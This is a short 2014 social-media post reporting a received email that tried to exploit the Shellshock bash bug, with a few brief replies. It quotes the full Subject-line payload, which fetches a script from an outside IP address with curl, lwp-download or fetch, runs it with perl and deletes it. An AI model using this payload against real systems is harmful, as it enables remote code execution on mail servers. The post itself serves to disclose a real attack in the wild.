joeyh

joeyh at

Received email message that attempted to exploit shellshock bug. Manually joined the attacker's CNC irc channel, and it seems at least 2 mail servers were actually successfully exploited this way.

Subject: () { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download  178.254.31.165/ex.txt;fetch
        178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;

Jakukyo Friel likes this.

Stefano Zacchiroli shared this.

Any idea which MTA(s)?

Amitai Schleier at 2014-10-24T17:29:43Z

Pretty sure not postfix! ;)

joeyh at 2014-10-24T17:43:00Z

I weep for the futur... erm, present.

jasonriedy@fmrl.me at 2014-10-24T21:08:49Z